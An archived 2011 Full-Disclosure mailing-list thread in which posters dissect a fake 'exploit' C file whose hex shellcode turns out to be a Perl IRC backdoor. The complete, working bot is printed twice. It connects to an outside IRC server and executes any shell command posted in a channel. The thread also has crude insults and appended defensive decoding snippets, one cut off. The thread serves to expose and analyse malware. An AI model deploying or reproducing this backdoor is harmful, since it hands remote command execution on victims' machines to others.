Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-27 Thread rancor
#!/usr/bin/perl$chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron
+i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK
$nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print
$sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print
$sock RIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi
2/dev/null;/tmp/hi

2011/10/27 Joshua Thomas rappercra...@gmail.com:
 Use this link to decode the shellcode ...
 --- http://www.dolcevie.com/js/converter.html

 This executes the perl code on the local machine  :D




 On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Andrew Farmer
On 2011-10-25, at 19:15, adam wrote:
 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread,
 code is mentioned though)
 
 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a 
while. ;)


Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Flavio do Carmo Junior
'system(h3llcode)' ??

Should be fun...

On 10/26/11, xD 0x41 sec...@gmail.com wrote:
 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose it,
 and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


-- 
Sent from my mobile device

--
Best regards,

Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Flavio do Carmo Junior
sounds really useful...

[waKKu@1215n ~]$ python -c 'hellcode=(
\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63
 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69
 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72
 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e
 \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65
 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f
 \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49
 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e
 \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22
 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63
 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d
 \x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43
 \x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68
 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20
 \x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64
 \x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65
 \x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d
 \x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d
 \x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20
 \x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c
 \x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22
 \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53
 \x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20
 \x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66
 \x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20
 \x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20
 \x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f
 \x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63
 \x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68
 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f
 \x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
 \x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e
 \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28
 \x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24
 \x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d
 \x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24
 \x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24
 \x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22
 \x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22
 \x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c
 \x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d
 \x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64
 \x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69); print 
 hellcode;'
#!/usr/bin/perl
$chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron
+i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK
$nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print
$sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print
$sock PRIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi
2/dev/null;/tmp/hi
[waKKu@1215n ~]$

print hellcode[764:];'
/tmp/hi


--

On 26 October 2011 13:49, xD 0x41 sec...@gmail.com wrote:
 yer ofc... anyhow, ignoring you now...

 you obv think your some leet troll, your not, your ONLY a TROLL :)
 have a nice day or is that

 *Goplamamamama Ignananayu*

 forget the jedi oky, you gotta brushup on ya troll trash talk!
 bah hahaha.
 fool
 xd


 On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burger can be dangerous pandawan.
 More over if you work at burger king.



 On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is
 a good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?
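
Added example, not part of the original thread and not any poster's code: a static triage of a C file's \xNN "shellcode" array that decodes it without compiling or running anything, and reports when the bytes are really an interpreter script, which is what the python -c decode above revealed. The function names, the marker list and both sample arrays are assumptions constructed for this illustration.

```python
import re

# One C string literal, allowing backslash escapes inside it.
C_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
# A single \xNN escape inside a literal.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Assumed marker list: text that has no business inside real machine code.
SCRIPT_MARKERS = (b"#!/", b"IO::Socket", b"PRIVMSG", b"/tmp/", b"chmod ")


def decode_hex_literals(c_source):
    """Concatenate every string literal made up only of \\xNN escapes.

    Simplification: all such literals in the file are joined in order,
    which matches the usual single 'char shellcode[] = "..." "...";' layout.
    """
    out = bytearray()
    for literal in C_STRING.findall(c_source):
        escapes = HEX_ESCAPE.findall(literal)
        # Each escape is 4 characters; skip literals with anything else in them.
        if escapes and len(escapes) * 4 == len(literal):
            out.extend(int(h, 16) for h in escapes)
    return bytes(out)


def printable_ratio(payload):
    """Fraction of bytes that are printable ASCII, tab, LF or CR."""
    if not payload:
        return 0.0
    ok = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(payload)


def triage(c_source):
    """Decode the embedded array and decide whether it is script text."""
    payload = decode_hex_literals(c_source)
    ratio = printable_ratio(payload)
    markers = [m.decode() for m in SCRIPT_MARKERS if m in payload]
    is_text = ratio > 0.95
    return {
        "length": len(payload),
        "printable_ratio": ratio,
        "markers": markers,
        "looks_like_script": payload.startswith(b"#!") or (is_text and bool(markers)),
        # Only hand back readable text; raw binary is left for a disassembler.
        "text": payload.decode("latin-1") if is_text else None,
    }


def c_literal(data, width=8):
    """Helper used only to build the constructed samples below."""
    rows = [data[i:i + width] for i in range(0, len(data), width)]
    return "\n".join(
        '    "' + "".join("\\x%02x" % b for b in row) + '"' for row in rows
    )


# Constructed sample 1: a harmless script hidden as a hex-escaped array.
SAMPLE_FAKE = (
    "char hellcode[] =\n"
    + c_literal(b"#!/bin/sh\necho constructed sample\n# written to /tmp/hi\n")
    + ";\n"
)

# Constructed sample 2: non-printable filler bytes standing in for real code.
SAMPLE_BINARY = (
    "char code[] =\n"
    + c_literal(b"\x90\x90\x90\xcc\x00\x01\xfe\xff")
    + ";\n"
)

if __name__ == "__main__":
    for name, src in (("fake", SAMPLE_FAKE), ("binary", SAMPLE_BINARY)):
        result = triage(src)
        print(name, result["looks_like_script"], result["markers"])
        if result["text"]:
            print(result["text"])
```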

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread GloW - XD
Ok... am awake now and, have some infos yes...
Interesting bot.
Seems i have spoken with some people regarding this and the release. Here is
a brief outline of how it goes.
Attacks were done on some people who run shells on efnet irc network, so in
order to catch the *morons* or, ppl who did launch the DoS
would then be showing up in #darknet channel, and responds to the ops or,
channel.
I ran this and saw it still clobbers smb, and still uses the original bug, so
d0s will still occur,
however, it will try and join, i believe thats a dead link in there now but,
would have tried to join a efnet node..
Speaking with #darknet owners:

 ok dude why was this released...
msg we released the original working code. this started a massive war of
the kids,
unfortunately many innocent boxes got raped, so we decided to play a small
game, and make a *version plus*
or so so say.
 very interesting concept, new, intuitive to use perl, as many people would
decrypt it tho, using perl -e , isnt this a little harsh...
msg they run it, it wont affect them, at all, they will see the connection
and kill it, and since no D0s is launched, it wont really work
 hrmm well, it is a good idea, to capture the arseholes who wish to ddos
etc... i see why it is done but also, can i ask you
  do you know what a darknet is ? because, you seem to not see that, ppl
would assume this channel is all about 'darknets'..
 instead it is only capturing people who will launch a DoS tool,and many
people seem 'idle'.
msg we dont control who comes here, now care, but when it comes to d0s, we
dont scrw about.hit us,and we will hit back.
Also, why are you asking me about code wich was made in 2003 or so :P~
 ahh well, thats purely because, i expose any BS like this code is, but, i
will not mark this as bullshit.
  it is horseshit :P and, i respect that your at the least, using some
shitty tool like d0s, instead of faking an exploit.
  I will class this not as exposed atall, instead, it will serve as some
form of tuition to skids.
  Run the tools you cannot read, and, expect even some shitty perlbot to pop
out. I like it!
  I will class this as exposed but intuitive, thankyou for your time.
msg i dont care what you mark it as, the rule is simple, do not run d0s
./appz ! Have a nice day!
 Again thanks for your time, i will keep the nickname anonymous... your not
classed as a now-owner , so i guess it is more wtf this was all about, even
when you wrote the .c or, as i know it,
   was 'brain' or some dude... either way, i tip the black hat to you but
also warn you not always will them kids be happy to be owned by shitty .c ,
so, id be expecting more problems from release, than not
   This is your problem, and, i respect your views, just get some knowledge
into you about wtf a 'darknet' is prompto!
   Also have a nice day.

..
Ok so, basically the talk i had with a now non op of channel but,
interesting coz, it is actually very popular, yet only a few actually
realise that they're being linked now to a darknet technology app etc, and
they're finding that maybe they should have kept those old ops :P or maybe
they could just release 'ipv6killer.c' and just fix some
settings.. either way, it is kinda unique, and strange why there was no chat
about this app, until now.. nothing
solid which shows this perl, and admittedly, thats a VERY clever bot for such
a small piece of code.
Anyhow, thanks to those who found this interesting, sorry to those who didnt
:)
I think i might hang in darknet channel and wait for a few Hi im a lamer!
etc... rofl.
cheers, and cheers to #darknet for at least not faking the tool completely,
and, using a skeleton and structure of their OWN code.
Winnuke2000.c is NOT backdoored, and IS theirs also, I think they regret
releasing it now but, this was 2003, and, as i said, i will try and expose
anything i find strange, however, from now on, ill be marking exposes under
noise, as they're non disclosures.
xd




On 26 October 2011 16:55, Flavio do Carmo Junior carmo.fla...@gmail.com wrote:

 sounds really useful...

 [waKKu@1215n ~]$ python -c 'hellcode=(

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Antony widmal
You think no one saw your trolls coming ?

Time to grow the fuck up fat ass.


On Tue, Oct 25, 2011 at 10:49 PM, xD 0x41 sec...@gmail.com wrote:

 yer ofc... anyhow, ignoring you now...

 you obv think your some leet troll, your not, your ONLY a TROLL :)
 have a nice day or is that

 *Goplamamamama Ignananayu*

 forget the jedi oky, you gotta brushup on ya troll trash talk!
 bah hahaha.
 fool
 xd



 On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burger can be dangerous pandawan.

 More over if you work at burger king.



 On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is
 a good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?
 Is it good ?
 hehe... maybe it is!
 i guess if hes using it...well...
 *sic*




 On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical
 code, claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked
 private exploit on pastebin a few weeks back (you know, the one that 
 was
 nice enough to create a _local_ root account), and insisted that it was
 private private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many
 boxes yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some
 opinion, other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a
 look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill
 know abit more..
 altho , i rmember this thing, and, somany people were after it,
 people were paying for it, this is first time i have seen it actually
 disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can
 expose it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Joshua Thomas
Use this link to decode the shellcode ...
--- http://www.dolcevie.com/js/converter.html

This executes the perl code on the local machine  :D




On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!



[Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
Hello List,
I'd like people to also, like this thread asks, to pls give some opinion,
other than mine.. which, i am yet to make;

http://www.hackerthreads.org/Topic-5973

Please look at this .c code on here, if you wish, and tell me, why
A. It is still in circulation, seemingly, on MANY MANY boxes
B. people still seem to try keep it private :s

This morning, a friend from webhostingtalk.com, asked me to take a look.
I have and, i can only so far say, once i decrypt the shellcode, ill know
a bit more..
altho, i remember this thing, and, so many people were after it, people were
paying for it, this is first time i have seen it actually disclosed tho,
admittedly only looked today.
If skiddies are using it to ddos things, I want to make sure i can expose it,
and kill the threats.
thank you.
xd .// exposing bullshit as i ride!

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Mike Hale
Exploits this, maybe?

http://www.us-cert.gov/cas/bulletins/SB05-040.html#smb

On Tue, Oct 25, 2011 at 6:50 PM, xD 0x41 sec...@gmail.com wrote:
 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose it,
 and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!






-- 
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
Hrm, exactly what im wondering about, is that packet just 'junk' in effect,
or just hiding more :s
I will investigate it.
It is strange tho, as nothing of the *normal* has detected anything malign
yet to me, but, i just started the OS i use for this stuff 20 seconds ago,
and it has only read a few sectors of the code so far... yes, it is a home
lab, it is just IBM x3 3U racks, put together in a DIYs kinda rack, but works
for me :)
It is also a 'darknet', so many of this kinda network shit seems to dribble
in from many places, atm it seems, this is the .c file they're trying to
hide, apparently it can send a negotiation which just trashes the SMB client,
according to this, which i am going to see what does exactly in about
5 minutes :P
i will keep you informed as yes, usually most ddos which uses *trash* code to
send as broadcasting packet, would encapsulate exactly this, BS, which, this
is not.
It is some code in there, but, it is also not str8 forward yet for me, until
i have results but, it does spawn some strange sockets :s
I will see where it leads.
thx for that info about the SMB bugs, i do know of them but, just have seen
this done once properly on linux, which is a really hardass attacking tool,
and clobbers smb server, but, this one seemingly does it differently.
there is a winssmb-nuke tool already, i know that DOES work 100% now i did
a little google b4 ending this post, and, this is the apparent descendant,
which was sold.
I will look now and wait for my os to read thru it a bit... and darknet to
see where it connects.
interesting one tho.
i have also found similar code, for something else called ipv6killer.c, no
not ipv6fuck.c which is also, actually real, but, ipv6killer.c, which is
almost exactly this same code, but, actually seems setup for ipv6, so makes
me think about this one harder :s
i am stumped until i have a malware analysis from my box, as i dont run
things at first glance, specially ddos crap, that will certainly lead to mem
corruption :P
ok, cheers so far, ill keep looking!
xd


On 26 October 2011 13:03, Flavio do Carmo Junior carmo.fla...@gmail.com wrote:

 'system(h3llcode)' ??

 Should be fun...

 On 10/26/11, xD 0x41 sec...@gmail.com wrote:
  Hello List,
  Id like people to also, like this thread asks, to pls give some opinion,
  other than mine.. wich, i am yet to make;
 
  http://www.hackerthreads.org/Topic-5973
 
  Please look at this .c code on here, if you wish, and tell me, why
  A. It is still in circulation, seeminlgly, on MANY MANY boxes
  B. people still seem to try keep it private :s
 
  This morning, a friend from webhostingtalk.com ,asked me to take a look.
  I have and, i can only sofar say, once i decrypt the shellcode, ill  know
  abit more..
  altho , i rmember this thing, and, somany people were after it, people
 were
  paying for it, this is first time i have seen it actually disclosed tho,
  admittedly only looked today.
  If skiddies are using it to ddos things, I want to makesure i can expose
 it,
  and kill the threats.
  thankyou.
  xd .// exposing bullshit as i ride!
 

 --
 Sent from my mobile device

 --
 Best regards,

 Flávio do Carmo Júnior
 Sydney/NSW
 http://au.linkedin.com/in/carmoflavio/en
 http://0xcd80.wordpress.com


Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
I use darknets to help me,
they send me the info i need.
simple answer to simple question.
look them up, they may one day protect you, also.


On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes yet
 know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread adam
http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
claims to be a remote kernel root exploit)
http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
code, claims to be an IIS exploit)
http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread,
code is mentioned though)

I'm sure there's more, but this kinda reminds me of that leaked private
exploit on pastebin a few weeks back (you know, the one that was nice
enough to create a _local_ root account), and insisted that it was private
private private and specifically said NOT to leak it.

I am curious as to how you're so certain that it's on many many boxes yet
know next to nothing about it.

On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
Ok... i see now, it is being disguised, from a long time ago...
strange why it is being used, unless people have started to rename things
maybe... to suit old things, which dont work :s
it is possible...
I will see what it is doing and done so far in the darknet i have setup in a
sec and, that will be it.
ok.. cheers.


On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes yet
 know next to nothing about it.

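Added example (not part of any post in this thread, and not code from the file under discussion): what a "shellcode" array contains can be read statically, without compiling or running the C source, by decoding its `\xNN` string literals and checking whether the result is script text rather than machine code. `SAMPLE_C` and its payload are constructed and harmless; the indicator strings are those visible in the decoded Perl quoted elsewhere in this thread.

```python
import re

C_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')   # C string literal body
HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')     # one \xNN escape
# Strings visible in the decoded Perl quoted in this thread.
INDICATORS = ("#!/usr/bin/perl", "IO::Socket", "PRIVMSG", "NICK ")

def decode_hex_literals(c_source):
    """Return the bytes encoded by string literals that are mostly \\xNN escapes."""
    out = bytearray()
    for match in C_STRING.finditer(c_source):
        body = match.group(1)
        escapes = HEX_ESC.findall(body)
        # Skip ordinary text such as usage messages: require at least 8
        # escapes that make up 80% or more of the literal.
        if len(escapes) >= 8 and 4 * len(escapes) >= 0.8 * len(body):
            out.extend(int(h, 16) for h in escapes)
    return bytes(out)

def printable_ratio(blob):
    """Fraction of bytes that are printable ASCII, tab, CR or LF."""
    if not blob:
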